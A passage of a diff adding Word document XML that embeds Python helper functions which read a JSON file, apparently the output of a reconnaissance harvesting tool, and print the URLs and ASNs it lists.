+        <w:t>len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>interesting_urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            print(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>interesting_urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>])</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>elif</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>" in obj:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = obj['</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>']</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">        for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in range(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            print(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>urls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>])</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">def </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_asns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_harv_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    obj = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>read_json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_harv_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    if "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>asns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>" not in obj:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        print("No ASNs found")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>elif</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>asns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>" in obj:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>asns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = obj['</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>asns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>']</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in range(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>len</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>asns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            print(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>asns</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>])</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NoSpacing"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>json_file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
